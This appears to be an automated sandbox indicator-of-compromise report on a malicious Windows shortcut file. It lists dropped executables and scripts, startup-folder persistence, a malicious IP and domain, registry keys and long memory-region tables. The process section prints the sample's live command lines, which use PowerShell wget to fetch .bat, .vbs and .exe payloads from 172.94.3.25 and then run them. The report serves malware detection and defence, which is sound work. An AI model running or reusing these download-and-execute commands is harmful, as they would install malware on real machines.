IOC Report
Dlr7HYI6VL.lnk

loading gif

Files

File Path
Type
Category
Malicious
Dlr7HYI6VL.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has command line arguments, Icon number=1, Archive, ctime=Mon Aug 26 12:29:30 2024, mtime=Mon Aug 26 12:29:30 2024, atime=Mon Aug 26 12:29:30 2024, length=278528, window=hidenormalshowminimized
initial sample
malicious
C:\Users\user\AppData\Local\Temp\demhwk
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\gps
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\qapuwvr
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\AUGUST.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\ffo.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\hello.bat
DOS batch file, ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\hi.vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\DZIPR.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\DZIPR.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage user DataBase, version 0x620, checksum 0xa0cf7431, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\6e17276
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5w0ugwjb.zhf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chua5xud.xaa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_exkyhqr3.khy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_issxs0m2.1x4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itcxxoq4.eoy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jdnnkvff.gsl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jhkk0vgu.afh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlvabzwv.nho.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\f155ca23
data
dropped
C:\Users\user\AppData\Local\Temp\fc577906
data
dropped
C:\Users\user\AppData\Local\Temp\uvnhjq
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:40:34 2024, mtime=Wed Sep 25 15:40:34 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT2369.tmp
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:40:34 2024, mtime=Wed Sep 25 15:40:34 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oracledemo_dbg.lnk (copy)
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:40:34 2024, mtime=Wed Sep 25 15:40:34 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
dropped
C:\Users\user\AppData\Roaming\Ruy_driverv2\ekqqtq
data
dropped
C:\Users\user\AppData\Roaming\Ruy_driverv2\ipqtwm
data
dropped
C:\Users\user\ekqqtq
data
dropped
C:\Users\user\ipqtwm
data
dropped
C:\Windows\Tasks\lnfast_x64.job
data
dropped
There are 25 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat && C:\Users\user\AppData\Roaming/hello.bat
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell wget http://172.94.3.25/hello.bat -OutFile C:\Users\user\AppData\Roaming/hello.bat
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs
malicious
C:\Windows\System32\cmd.exe
cmd /c C:\Users\user\AppData\Roaming/hi.vbs
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" "
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe
malicious
C:\Users\user\AppData\Roaming\AUGUST.exe
C:\Users\user\AppData\Roaming/AUGUST.exe
malicious
C:\Users\user\DZIPR.exe
"C:\Users\user\DZIPR.exe"
malicious
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
malicious
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
"C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 16 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://172.94.3.25/hi.vbs
172.94.3.25
malicious
http://172.94.3.25/AUGUST.exe
172.94.3.25
malicious
http://172.94.3.25/ffo.bat
172.94.3.25
malicious
fullimmersion777.com
malicious
http://172.94.3.25/hello.bat
172.94.3.25
malicious
https://g.live.com/odclientsettings/Prod1C:
unknown
https://www.digicert.c
unknown
http://www.vmware.com/0
unknown
https://www.datanumen.com/zip-repair/
unknown
http://www.symauth.com/rpa00
unknown
https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm
unknown
http://www.info-zip.org/
unknown
http://www.vmware.com/0/
unknown
https://g.live.com/odclientsettings/ProdV21C:
unknown
https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf
unknown
http://c0rl.m%L
unknown
http://www.repairfile.com
unknown
http://www.symauth.com/cps0(
unknown
http://support.datanumen.com
unknown
https://www.datanumen.com/%https://www.datanumen.com/zip-repair/
unknown
https://www.datanumen.com/support/
unknown
There are 11 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
172.94.3.25
unknown
United States
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 8 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
5816000
trusted library allocation
page read and write
malicious
459000
unkown
page readonly
malicious
5010000
direct allocation
page read and write
malicious
459000
unkown
page readonly
malicious
49CB000
trusted library allocation
page read and write
malicious
4EFE000
trusted library allocation
page read and write
malicious
4DA6000
trusted library allocation
page read and write
malicious
4E34000
trusted library allocation
page read and write
malicious
35DF000
heap
page read and write
malicious
5DB0000
direct allocation
page read and write
malicious
4EE1000
trusted library allocation
page read and write
malicious
459000
unkown
page readonly
malicious
5950000
direct allocation
page read and write
malicious
CF6000
heap
page read and write
2061F260000
heap
page read and write
1F7D7A10000
heap
page read and write
518E000
direct allocation
page read and write
E26000
heap
page read and write
2A44000
unkown
page read and write
A5F3FE000
stack
page read and write
B498FFE000
stack
page read and write
E26000
heap
page read and write
B499A7E000
stack
page read and write
2BB6000
unkown
page read and write
23E0000
heap
page read and write
41A000
unkown
page readonly
40FB000
unkown
page read and write
D81000
heap
page read and write
4FD0000
direct allocation
page read and write
2BAE000
unkown
page read and write
32EA000
heap
page read and write
EDE000
stack
page read and write
2A10000
heap
page read and write
3300000
unkown
page read and write
2BB6000
unkown
page read and write
2BB6000
unkown
page read and write
8C8000
unkown
page write copy
3B30000
trusted library allocation
page read and write
5CB1000
unkown
page read and write
299F000
heap
page read and write
2334000
unkown
page read and write
4FB9000
direct allocation
page read and write
7DD000
stack
page read and write
8C8000
unkown
page read and write
B498577000
stack
page read and write
2BB6000
unkown
page read and write
295F000
stack
page read and write
3340000
heap
page read and write
2D8E000
unkown
page read and write
E00000
heap
page read and write
2334000
unkown
page read and write
2A30000
unkown
page read and write
450000
heap
page read and write
2BB6000
unkown
page read and write
2BB6000
unkown
page read and write
DD4000
heap
page read and write
DCE000
stack
page read and write
2340000
unkown
page readonly
2BB6000
unkown
page read and write
34B4000
unkown
page read and write
2BB6000
unkown
page read and write
2061F289000
heap
page read and write
B4995FE000
stack
page read and write
38F7000
heap
page read and write
387B000
heap
page read and write
2A20000
unkown
page read and write
C70000
heap
page read and write
2061F150000
trusted library allocation
page read and write
38A4000
unkown
page read and write
278D000
heap
page read and write
2AD0000
heap
page read and write
E54000
heap
page read and write
20619C13000
heap
page read and write
34B4000
unkown
page read and write
2334000
unkown
page read and write
417000
unkown
page write copy
34B4000
unkown
page read and write
A5FAFE000
stack
page read and write
101E000
stack
page read and write
2061F020000
trusted library allocation
page read and write
2E6C000
unkown
page read and write
2ADE000
stack
page read and write
2AE5000
heap
page read and write
2061AA40000
trusted library section
page readonly
20619C8D000
heap
page read and write
3588000
heap
page read and write
285E000
stack
page read and write
20619C7C000
heap
page read and write
3390000
heap
page read and write
2061AB80000
trusted library allocation
page read and write
2334000
unkown
page read and write
4E81000
unkown
page read and write
8A2000
unkown
page write copy
E4E000
stack
page read and write
53A1000
unkown
page read and write
4BAA000
heap
page read and write
32E7000
heap
page read and write
29A1000
heap
page read and write
CF6000
heap
page read and write
2350000
unkown
page readonly
2061F030000
trusted library allocation
page read and write
567E000
stack
page read and write
2E5C000
stack
page read and write
1F7D7AC8000
heap
page read and write
401000
unkown
page execute read
5000000
unkown
page read and write
1F7D79B0000
heap
page read and write
33A2000
heap
page read and write
5A9E000
direct allocation
page read and write
CF0000
heap
page read and write
9B000
stack
page read and write
32B1000
heap
page read and write
53A1000
unkown
page read and write
19A000
stack
page read and write
4C79000
heap
page read and write
2BB6000
unkown
page read and write
2BB7000
unkown
page read and write
41C000
unkown
page execute read
34B7000
heap
page read and write
2C90000
heap
page read and write
347E000
unkown
page read and write
2F94000
unkown
page read and write
A5FBFB000
stack
page read and write
2061F264000
heap
page read and write
2334000
unkown
page read and write
2DF0000
heap
page read and write
2BB6000
unkown
page read and write
2061F007000
trusted library allocation
page read and write
5780000
unkown
page read and write
53B0000
unkown
page read and write
2581000
heap
page read and write
34B4000
unkown
page read and write
CCC000
heap
page read and write
268A000
heap
page read and write
2061A500000
heap
page read and write
3480000
direct allocation
page read and write
4002000
unkown
page read and write
1F7D7A46000
heap
page read and write
19B000
stack
page read and write
27FA000
stack
page read and write
2F80000
unkown
page readonly
2061AA80000
trusted library section
page readonly
2061EFB0000
trusted library allocation
page read and write
E20000
heap
page read and write
2334000
unkown
page read and write
29A0000
heap
page read and write
6FA75000
unkown
page read and write
2FDE000
heap
page read and write
E54000
heap
page read and write
4DE000
stack
page read and write
3360000
heap
page read and write
37D4000
heap
page read and write
9C000
stack
page read and write
4DEB000
trusted library allocation
page read and write
2AD3000
heap
page read and write
32B1000
heap
page read and write
FBB000
heap
page read and write
E26000
heap
page read and write
27FF000
heap
page read and write
2061F140000
trusted library allocation
page read and write
1F7D7A38000
heap
page read and write
3FF0000
unkown
page read and write
D4A000
heap
page read and write
33BB000
heap
page read and write
1F7D7A3A000
heap
page read and write
2BB6000
unkown
page read and write
478000
unkown
page readonly
34B4000
unkown
page read and write
A5F8FE000
stack
page read and write
CCE000
stack
page read and write
C80000
heap
page read and write
2BB6000
unkown
page read and write
2580000
heap
page read and write
28A0000
heap
page read and write
50BE000
direct allocation
page read and write
34B4000
unkown
page read and write
4C5E000
direct allocation
page read and write
34B4000
unkown
page read and write
2581000
heap
page read and write
DEE000
stack
page read and write
D0E000
heap
page read and write
2A70000
heap
page read and write
2334000
unkown
page read and write
1F7D7A61000
heap
page read and write
1F7D7AB4000
heap
page read and write
2334000
unkown
page read and write
2E60000
direct allocation
page read and write
511D000
direct allocation
page read and write
23F0000
heap
page read and write
6C511000
unkown
page execute read
34EB000
heap
page read and write
E26000
heap
page read and write
8C9000
unkown
page read and write
2334000
unkown
page read and write
31EC000
heap
page read and write
5F40000
heap
page read and write
2BB0000
heap
page read and write
37CF000
stack
page read and write
2061A415000
heap
page read and write
2334000
unkown
page read and write
5E5000
heap
page read and write
B49927E000
unkown
page readonly
2334000
unkown
page read and write
2BB6000
unkown
page read and write
1F7D7A5F000
heap
page read and write
2061A402000
heap
page read and write
29B8000
heap
page read and write
B499BFE000
unkown
page readonly
6FAF1000
unkown
page read and write
4AC0000
direct allocation
page read and write
29A1000
heap
page read and write
32D1000
heap
page read and write
40C0000
unkown
page read and write
338D000
heap
page read and write
4B11000
heap
page read and write
502E000
direct allocation
page read and write
2334000
unkown
page read and write
38A4000
unkown
page read and write
3308000
heap
page read and write
4FF0000
direct allocation
page read and write
2061A51A000
heap
page read and write
2BB6000
unkown
page read and write
E54000
heap
page read and write
370B000
heap
page read and write
402A000
unkown
page read and write
41B6000
unkown
page read and write
A5EF4A000
stack
page read and write
2334000
unkown
page read and write
20619C00000
heap
page read and write
297B000
heap
page read and write
2334000
unkown
page read and write
6C510000
unkown
page readonly
B49997E000
unkown
page readonly
2DDE000
unkown
page read and write
2E60000
unkown
page read and write
E50000
heap
page read and write
C70000
heap
page read and write
A5F2FE000
stack
page read and write
2334000
unkown
page read and write
2570000
heap
page read and write
30D8000
heap
page read and write
E54000
heap
page read and write
432000
unkown
page readonly
32D1000
heap
page read and write
2B9F000
stack
page read and write
32AF000
stack
page read and write
2BB6000
unkown
page read and write
2334000
unkown
page read and write
403B000
unkown
page read and write
1F7D7A86000
heap
page read and write
33D2000
heap
page read and write
F40000
heap
page read and write
2CF0000
heap
page read and write
558A000
heap
page read and write
40C2000
unkown
page read and write
CF6000
heap
page read and write
CF6000
heap
page read and write
231A000
stack
page read and write
4EE000
heap
page read and write
2BB6000
unkown
page read and write
482000
unkown
page write copy
D3B000
heap
page read and write
113F000
stack
page read and write
26DC000
heap
page read and write
2A9E000
stack
page read and write
2334000
unkown
page read and write
2B66000
heap
page read and write
50D0000
heap
page read and write
FA2000
heap
page read and write
2970000
heap
page read and write
401000
unkown
page execute read
F2F000
stack
page read and write
3810000
unkown
page read and write
8D0000
heap
page read and write
26FC000
stack
page read and write
368F000
unkown
page read and write
2BB6000
unkown
page read and write
2334000
unkown
page read and write
31D0000
heap
page read and write
76D000
stack
page read and write
FDF000
stack
page read and write
1F7D7A5C000
heap
page read and write
417000
unkown
page read and write
6FAE8000
unkown
page readonly
C70000
heap
page read and write
2BB6000
unkown
page read and write
38A0000
unkown
page read and write
B499D7D000
stack
page read and write
49E000
stack
page read and write
1F7D7A39000
heap
page read and write
29A2000
heap
page read and write
3C5D000
trusted library allocation
page read and write
2B94000
heap
page read and write
413000
unkown
page readonly
2BDE000
stack
page read and write
DD4000
heap
page read and write
2A44000
unkown
page read and write
6C545000
unkown
page read and write
2BB8000
unkown
page read and write
1F7D7A5B000
heap
page read and write
B4994FE000
stack
page read and write
B49977B000
stack
page read and write
B49887E000
stack
page read and write
2061EFE0000
trusted library allocation
page read and write
34B4000
unkown
page read and write
2061A502000
heap
page read and write
5900000
direct allocation
page read and write
6FAC1000
unkown
page execute read
2334000
unkown
page read and write
1F7D7A37000
heap
page read and write
2BB6000
unkown
page read and write
34B4000
unkown
page read and write
34B4000
unkown
page read and write
57CD000
trusted library allocation
page read and write
36FA000
heap
page read and write
7BE000
stack
page read and write
2B7E000
heap
page read and write
8D0000
unkown
page readonly
2BB6000
unkown
page read and write
2061F0D0000
trusted library allocation
page read and write
2334000
unkown
page read and write
2334000
unkown
page read and write
A5F6FE000
stack
page read and write
D13000
heap
page read and write
1F7D79B5000
heap
page read and write
2334000
unkown
page read and write
2334000
unkown
page read and write
26E4000
heap
page read and write
40B0000
unkown
page read and write
33EF000
heap
page read and write
20619CB2000
heap
page read and write
35BF000
heap
page read and write
72C000
stack
page read and write
2F94000
unkown
page read and write
20619CFE000
heap
page read and write
31E0000
heap
page read and write
478000
unkown
page readonly
F90000
heap
page read and write
19C000
stack
page read and write
253E000
stack
page read and write
2061F292000
heap
page read and write
B498F7E000
unkown
page readonly
D10000
heap
page read and write
28CF000
unkown
page read and write
2334000
unkown
page read and write
F9F000
heap
page read and write
2334000
unkown
page read and write
1F7D7A86000
heap
page read and write
DD4000
heap
page read and write
2061F1A0000
remote allocation
page read and write
41A000
unkown
page readonly
2334000
unkown
page read and write
2AD4000
heap
page read and write
5940000
unkown
page read and write
504D000
direct allocation
page read and write
3060000
heap
page read and write
B498B7E000
unkown
page readonly
34B4000
unkown
page read and write
4C34000
heap
page read and write
34F9000
heap
page read and write
27E3000
heap
page read and write
2AC0000
heap
page read and write
FDB000
heap
page read and write
581E000
stack
page read and write
DD4000
heap
page read and write
34B4000
unkown
page read and write
20619C2B000
heap
page read and write
2BB7000
unkown
page read and write
2CDF000
stack
page read and write
29A7000
heap
page read and write
8BF000
stack
page read and write
2061A3D0000
trusted library allocation
page read and write
2E1F000
stack
page read and write
3EE6000
unkown
page read and write
F48000
heap
page read and write
2334000
unkown
page read and write
34B4000
unkown
page read and write
6FA71000
unkown
page read and write
2BB6000
unkown
page read and write
2334000
unkown
page read and write
2061F287000
heap
page read and write
B499AFE000
stack
page read and write
E54000
heap
page read and write
9C000
stack
page read and write
E26000
heap
page read and write
34B4000
unkown
page read and write
3347000
heap
page read and write
2BB6000
unkown
page read and write
2BB7000
unkown
page read and write
B4998FE000
stack
page read and write
2998000
heap
page read and write
2061F0D0000
trusted library allocation
page read and write
CF6000
heap
page read and write
20619B60000
trusted library section
page read and write
2990000
heap
page read and write
1F7D7940000
heap
page read and write
2DE0000
heap
page read and write
2BB6000
unkown
page read and write
34B4000
unkown
page read and write
2061F000000
trusted library allocation
page read and write
591F000
stack
page read and write
2334000
unkown
page read and write
34B4000
unkown
page read and write
1F7D7950000
heap
page read and write
2A60000
heap
page read and write
102F000
stack
page read and write
38A4000
unkown
page read and write
2061AA60000
trusted library section
page readonly
B498E7B000
stack
page read and write
2334000
unkown
page read and write
258D000
heap
page read and write
E54000
heap
page read and write
B499E7E000
unkown
page readonly
2DE0000
heap
page read and write
2334000
unkown
page read and write
6FAF1000
unkown
page read and write
51F000
heap
page read and write
79C000
stack
page read and write
2F4B000
stack
page read and write
118F000
stack
page read and write
2334000
unkown
page read and write
1F7D7A21000
heap
page read and write
B4990FE000
stack
page read and write
29F0000
heap
page read and write
2B60000
heap
page read and write
2FA0000
unkown
page readonly
EE0000
heap
page read and write
2061F05E000
trusted library allocation
page read and write
2334000
unkown
page read and write
516E000
direct allocation
page read and write
4FBD000
direct allocation
page read and write
2061F170000
trusted library allocation
page read and write
1F7D7AB4000
heap
page read and write
2061AA70000
trusted library section
page readonly
4EA000
heap
page read and write
2BB6000
unkown
page read and write
20619C3F000
heap
page read and write
2334000
unkown
page read and write
B49A07E000
unkown
page readonly
4BED000
direct allocation
page read and write
2BB6000
unkown
page read and write
2061A3E0000
trusted library allocation
page read and write
2334000
unkown
page read and write
34B4000
unkown
page read and write
29A6000
heap
page read and write
30D0000
heap
page read and write
2A30000
unkown
page readonly
2334000
unkown
page read and write
8D5000
heap
page read and write
1F7D7A5A000
heap
page read and write
4E98000
trusted library allocation
page read and write
DD4000
heap
page read and write
D00000
heap
page read and write
34B4000
unkown
page read and write
2061A513000
heap
page read and write
2061F200000
heap
page read and write
32D0000
heap
page read and write
1F7D7A75000
heap
page read and write
B4991FE000
stack
page read and write
29CF000
unkown
page read and write
2A44000
unkown
page read and write
471000
unkown
page write copy
20619D13000
heap
page read and write
2BB6000
unkown
page read and write
278F000
heap
page read and write
F93000
heap
page read and write
471000
unkown
page write copy
CF6000
heap
page read and write
2061F28C000
heap
page read and write
3FC0000
unkown
page read and write
2335000
unkown
page read and write
2BB6000
unkown
page read and write
2061F000000
trusted library allocation
page read and write
2D90000
unkown
page read and write
50FD000
direct allocation
page read and write
2977000
heap
page read and write
2061F130000
trusted library allocation
page read and write
2BB7000
unkown
page read and write
35C3000
heap
page read and write
4214000
unkown
page read and write
20619C8F000
heap
page read and write
400000
unkown
page readonly
8C8000
unkown
page read and write
C70000
heap
page read and write
CF6000
heap
page read and write
4E81000
unkown
page read and write
FA4000
heap
page read and write
577F000
stack
page read and write
2BB6000
unkown
page read and write
B49917E000
unkown
page readonly
7E0000
heap
page read and write
2061AA90000
trusted library section
page readonly
D50000
heap
page read and write
3140000
heap
page read and write
5467000
heap
page read and write
B49A17E000
stack
page read and write
20619D02000
heap
page read and write
2061F218000
heap
page read and write
4ADA000
heap
page read and write
9C000
stack
page read and write
E54000
heap
page read and write
DD4000
heap
page read and write
2BB6000
unkown
page read and write
2960000
heap
page read and write
2AC7000
heap
page read and write
2D60000
heap
page read and write
2FFD000
unkown
page read and write
B49867E000
unkown
page readonly
2A50000
unkown
page readonly
E26000
heap
page read and write
281E000
stack
page read and write
2BB6000
unkown
page read and write
29A0000
heap
page read and write
53A0000
unkown
page read and write
2334000
unkown
page read and write
35D1000
heap
page read and write
98B000
unkown
page readonly
400000
unkown
page readonly
B49987E000
unkown
page readonly
4A87000
heap
page read and write
D8E000
stack
page read and write
2BB6000
unkown
page read and write
34B0000
heap
page read and write
DD4000
heap
page read and write
6FA41000
unkown
page execute read
2334000
unkown
page read and write
2BB6000
unkown
page read and write
4E80000
unkown
page read and write
32F3000
heap
page read and write
3355000
heap
page read and write
2061F21F000
heap
page read and write
B49957E000
unkown
page readonly
2061F0E0000
trusted library allocation
page read and write
D9E000
stack
page read and write
20619C7A000
heap
page read and write
32D2000
heap
page read and write
2370000
heap
page read and write
2061F030000
trusted library allocation
page read and write
41CB000
unkown
page read and write
2334000
unkown
page read and write
B499C7E000
unkown
page readonly
5A2D000
direct allocation
page read and write
378F000
unkown
page read and write
FFD000
heap
page read and write
2334000
unkown
page read and write
2BB6000
unkown
page read and write
2A40000
unkown
page readonly
2335000
unkown
page read and write
E26000
heap
page read and write
2BB6000
unkown
page read and write
35B1000
heap
page read and write
CB8000
heap
page read and write
2D3C000
stack
page read and write
4BE9000
direct allocation
page read and write
2BB6000
unkown
page read and write
2334000
unkown
page read and write
2334000
unkown
page read and write
2061AA50000
trusted library section
page readonly
50F9000
direct allocation
page read and write
2A1B000
heap
page read and write
6FAC0000
unkown
page readonly
4CD0000
heap
page read and write
A5F9FE000
stack
page read and write
2334000
unkown
page read and write
2BB6000
unkown
page read and write
2334000
unkown
page read and write
4B56000
heap
page read and write
6C541000
unkown
page read and write
2061F160000
trusted library allocation
page read and write
2330000
heap
page read and write
2061A400000
heap
page read and write
2334000
unkown
page read and write
D7D000
heap
page read and write
2334000
unkown
page read and write
2061A940000
trusted library allocation
page read and write
2334000
unkown
page read and write
E54000
heap
page read and write
32ED000
heap
page read and write
2360000
unkown
page readonly
5E0000
heap
page read and write
20619A40000
heap
page read and write
2F5C000
stack
page read and write
2BB7000
unkown
page read and write
543000
heap
page read and write
2BB6000
unkown
page read and write
7D0000
heap
page read and write
2061F001000
trusted library allocation
page read and write
20619C72000
heap
page read and write
2D7D000
stack
page read and write
2061F044000
trusted library allocation
page read and write
5A29000
direct allocation
page read and write
DD0000
heap
page read and write
F9F000
heap
page read and write
2061F22C000
heap
page read and write
2BB6000
unkown
page read and write
1F7D7970000
heap
page read and write
4D5D000
trusted library allocation
page read and write
111F000
stack
page read and write
2334000
unkown
page read and write
2334000
unkown
page read and write
20619A20000
heap
page read and write
2334000
unkown
page read and write
23FE000
unkown
page read and write
6FA68000
unkown
page readonly
C80000
heap
page read and write
B49897E000
unkown
page readonly
2061F24C000
heap
page read and write
32FA000
stack
page read and write
2335000
unkown
page read and write
401000
unkown
page execute read
2981000
heap
page read and write
2061A601000
trusted library allocation
page read and write
B49A27E000
unkown
page readonly
2061EFF0000
trusted library allocation
page read and write
29AB000
heap
page read and write
20619BE1000
trusted library allocation
page read and write
6C538000
unkown
page readonly
3632000
heap
page read and write
20619B20000
heap
page read and write
2334000
unkown
page read and write
6FAF5000
unkown
page read and write
D1F000
heap
page read and write
482000
unkown
page write copy
3D4B000
unkown
page read and write
26D0000
heap
page read and write
401000
unkown
page execute read
4B90000
heap
page read and write
2F6E000
unkown
page read and write
1F7D7A46000
heap
page read and write
4E0000
heap
page read and write
29FA000
heap
page read and write
401000
unkown
page execute read
E26000
heap
page read and write
4EB5000
trusted library allocation
page read and write
6FA79000
unkown
page readonly
34B4000
unkown
page read and write
3180000
heap
page read and write
34B4000
unkown
page read and write
2BB6000
unkown
page read and write
CB0000
heap
page read and write
DC8000
heap
page read and write
B498A7C000
stack
page read and write
34B4000
unkown
page read and write
2334000
unkown
page read and write
20619C94000
heap
page read and write
2F90000
unkown
page readonly
2061AFA0000
trusted library allocation
page read and write
3870000
heap
page read and write
563E000
unkown
page read and write
A5F5FF000
stack
page read and write
B49907E000
unkown
page readonly
2BB6000
unkown
page read and write
4E90000
direct allocation
page read and write
3C59000
trusted library allocation
page read and write
4626000
heap
page read and write
417000
unkown
page execute read
2334000
unkown
page read and write
2334000
unkown
page read and write
2061F1A0000
remote allocation
page read and write
2334000
unkown
page read and write
3E1A000
unkown
page read and write
19D000
stack
